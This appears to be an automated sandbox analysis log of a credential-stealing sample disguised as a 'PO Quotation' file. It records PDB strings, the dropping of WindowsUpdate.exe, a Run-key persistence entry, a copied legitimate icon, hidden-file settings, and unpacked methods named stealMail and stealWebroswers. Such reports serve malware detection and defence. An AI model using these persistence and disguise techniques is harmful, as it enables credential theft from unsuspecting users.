              Source: Binary string: ColorAdapterClient.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: wsspicli.pdbkt source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: shcore.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: C:\Windows\dll\mscorlib.pdb source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.312366191.000000001C847000.00000004.00000040.sdmp
              Source: Binary string: wgdi32.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: fltLib.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: shell32.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: msvcr80.i386.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: msvcp_win.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: dpapi.pdbxs source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: shfolder.pdbit`F source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: dnsapi.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: rasapi32.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: System.Runtime.Remoting.pdb*p source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: userenv.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: wimm32.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: wwin32u.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: nlaapi.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: userenv.pdbqs source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: winnsi.pdbds source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: winhttp.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: wUxTheme.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: DDsymbols\dll\mscorlib.pdb source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.321080904.0000000021E7A000.00000004.00000010.sdmp
              Source: Binary string: wmiutils.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: gdiplus.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: mscorlib.pdbH source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.321080904.0000000021E7A000.00000004.00000010.sdmp
              Source: Binary string: rtutils.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: mscorwks.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: profapi.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: dhcpcsvc6.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: Kernel.Appcore.pdbGu source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: f:\binaries.x86ret\bin\i386\Microsoft.VisualBasic.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: wgdi32full.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: mscorjit.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: sechost.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: winhttp.pdb p source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: mscoree.pdbWsP source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: shfolder.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: wgdi32full.pdbmt@ source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: rasman.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: fastprox.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: wbemsvc.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: winrnr.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: System.Drawing.pdb@ source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: msctf.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: WindowsUpdate.exe
              Source: Binary string: System.Runtime.Remoting.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: wmswsock.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: version.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: rsaenh.pdb]t source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: System.Xml.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: System.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: mscms.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: mscorrc.pdb source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.304520747.000000001B140000.00000002.00000001.sdmp
              Source: Binary string: System.Windows.Forms.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: Kernel.Appcore.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: WMINet_Utils.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: psapi.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: fwpuclnt.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: bcrypt.pdb[t source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: cryptbase.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: wuser32.pdb@w source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: bcryptprimitives.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: mscoreei.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: nlaapi.pdb5o0 source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: C:\Windows\assembly\GA.pdbmscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.321080904.0000000021E7A000.00000004.00000010.sdmp
              Source: Binary string: msvcp_win.pdb[w source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: oleaut32.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: wuser32.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: wbemprox.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.312366191.000000001C847000.00000004.00000040.sdmp
              Source: Binary string: crypt32.pdb source: WERD288.tmp.mdmp.6.dr
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

              Data Obfuscation:

              barindex
              .NET source code contains potential unpackerShow sources
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1efe0000.6.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1efe0000.6.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1efe0000.6.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1efe0000.6.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 8.2.WindowsUpdate.exe.1ad90000.2.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 8.2.WindowsUpdate.exe.1ad90000.2.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 8.2.WindowsUpdate.exe.1ad90000.2.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 8.2.WindowsUpdate.exe.1ad90000.2.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 11.2.WindowsUpdate.exe.1eed0000.5.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 11.2.WindowsUpdate.exe.1eed0000.5.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 11.2.WindowsUpdate.exe.1eed0000.5.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 11.2.WindowsUpdate.exe.1eed0000.5.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 2_2_00404837 GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,#17,MessageBoxA,2_2_00404837
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_00401F16 push ecx; ret 0_2_00401F29
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_00AD1BF6 push ecx; ret 0_2_00AD1C09
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 2_2_00411879 push ecx; ret 2_2_00411889
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 2_2_004118A0 push eax; ret 2_2_004118B4
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 2_2_004118A0 push eax; ret 2_2_004118DC
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 3_2_00442871 push ecx; ret 3_2_00442881
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 3_2_00442A90 push eax; ret 3_2_00442AA4
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 3_2_00442A90 push eax; ret 3_2_00442ACC
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 3_2_00446E54 push eax; ret 3_2_00446E61
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_00401F16 push ecx; ret 8_2_00401F29
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_00ED1BF6 push ecx; ret 8_2_00ED1C09
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00401F16 push ecx; ret 11_2_00401F29
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00ED1BF6 push ecx; ret 11_2_00ED1C09
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeFile created: \po 2010029_pdf quotation from alibaba ale.exeJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeFile created: \po 2010029_pdf quotation from alibaba ale.exeJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeFile created: \po 2010029_pdf quotation from alibaba ale.exeJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeFile created: C:\Users\user\AppData\Roaming\WindowsUpdate.exeJump to dropped file
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Windows UpdateJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Windows UpdateJump to behavior

              Hooking and other Techniques for Hiding and Protection:

              barindex
              Icon mismatch, binary includes an icon from a different legit application in order to fool usersShow sources
              Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: icon (5001).png
              Changes the view of files in windows explorer (hidden files and folders)Show sources
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced HiddenJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 2_2_0040F64B memset,strcpy,memset,strcpy,strcat,strcpy,strcat,GetModuleHandleA,LoadLibraryExA,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_0040F64B
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
